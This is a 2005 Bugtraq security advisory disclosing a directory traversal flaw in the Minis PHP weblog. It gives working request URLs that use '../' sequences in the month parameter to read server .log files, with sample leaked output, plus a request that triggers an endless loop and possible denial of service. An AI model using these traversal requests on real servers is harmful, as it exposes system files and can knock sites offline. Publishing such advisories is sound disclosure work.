[prev in list] [next in list] [prev in thread] [next in thread] 

List:       bugtraq
Subject:    Minis directory traversal vulnerability
From:       Madelman <madelman () iname ! com>
Date:       2005-01-16 18:04:16
Message-ID: 41EAACA0.1040700 () iname ! com
[Download RAW message or body]

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1


Title: Minis directory traversal vulnerability
Vulnerability discovery: Madelman <madelman AT iname.com>
Date: 31/12/2004
Severity: Moderate

Summary:
- --------

(from vendor site: http://minis.sourceforge.net/)

Minis is a tiny, PHP-powered, text-file based weblogging system.
It is easily configured for normal use and it doesnt require any
databases, such as MySQL. Also, with some PHP-knowledge youll be
able to configure Minis endlessly.

Minis doesn't check the month parameter which allows reading any file with .log \
extension

This vulnerability has been tested with Minis 0.2.1


Details:
- --------

If we want to read /var/log/XFree86.0.log:

REQUEST:
http://[SERVER]/minis/minis.php?month=../../../../../../../../var/log/XFree86.0
RETURNS: (looking at source of HTML)
[...]
"></a><br>: <a href="minis.php?month=../../../../../../../../var/log/XFree86.0&entry=This \
is a pre-release version of XFree86, and is not supported in any "></a><br>: <a \
href="minis.php?month=../../../../../../../../var/log/XFree86.0&entry=way.  Bugs may \
be reported to XFree86@XFree86.Org and patches submitted "></a><br>: <a \
href="minis.php?month=../../../../../../../../var/log/XFree86.0&entry=to \
fixes@XFree86.Org.  Before reporting bugs in pre-release versions, "></a><br>: <a \
href="minis.php?month=../../../../../../../../var/log/XFree86.0&entry=please check \
the latest version in the XFree86 CVS repository "></a><br>: <a \
href="minis.php?month=../../../../../../../../var/log/XFree86.0&entry=(http://www.XFree86.Org/cvs).
 "></a><br>: <a href="minis.php?month=../../../../../../../../var/log/XFree86.0&entry=
 "></a><br>: <a href="minis.php?month=../../../../../../../../var/log/XFree86.0&entry=XFree86 \
Version 4.3.0.1 (Debian 4.3.0.dfsg.1-4 20040529113443 \
root@cyberhq.internal.cyberhqz.com) "></a><br>: <a \
href="minis.php?month=../../../../../../../../var/log/XFree86.0&entry=Release Date: \
15 August 2003 "></a><br>: <a \
href="minis.php?month=../../../../../../../../var/log/XFree86.0&entry=X Protocol \
Version 11, Revision 0, Release 6.6 "></a><br>: <a \
href="minis.php?month=../../../../../../../../var/log/XFree86.0&entry=Build Operating \
System: Linux 2.6.6-rc3-bk9 i686 [ELF] "></a><br>: <a \
href="minis.php?month=../../../../../../../../var/log/XFree86.0&entry=Build Date: 29 \
May 2004 [...]

If we try to read a file that doesn't exist (in this example /var/log/XFree86.log) \
Minis returns "No such month"

REQUEST:
http://[SERVER]/minis/minis.php?month=../../../../../../../../var/log/XFree86
RESPONSE:
No such month.


If we try to read a file the webserver doesn't have autorization to, Minis enters an \
endless loop which could cause an incredible amount of bandwith spent by the server \
or even a DoS

REQUEST:
http://[SERVER]/minis/minis.php?month=../../../../../../../../var/log/auth
RETURNS:
Warning: fopen(blog/../../../../../../../../var/log/auth.log): failed to open stream: \
Permission denied in /var/www/minis/minis.php on line 109

../../../../../../../../var/log/auth

Warning: feof(): supplied argument is not a valid stream resource in \
/var/www/minis/minis.php on line 111

Warning: fgets(): supplied argument is not a valid stream resource in \
/var/www/minis/minis.php on line 112

Warning: feof(): supplied argument is not a valid stream resource in \
/var/www/minis/minis.php on line 111

Warning: fgets(): supplied argument is not a valid stream resource in \
/var/www/minis/minis.php on line 112 [...]


Timeline
- --------

31/12/2004 - Vulnerability found
31/12/2004 - Vendor contacted
16/01/2005 - Vendor hasn't replied. Advisory released
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.3 (MingW32)
Comment: Using GnuPG with Thunderbird - http://enigmail.mozdev.org

iD8DBQFB6qyg3RWooxY20cIRAg4cAJ41z36lEK44et5nx4V6tspofoo+zACgnLr6
nUEj8oDBySiBN2ScbMinO7s=
=sSF1
-----END PGP SIGNATURE-----


[prev in list] [next in list] [prev in thread] [next in thread] 

Configure | About | News | Add a list | Sponsored by KoreLogic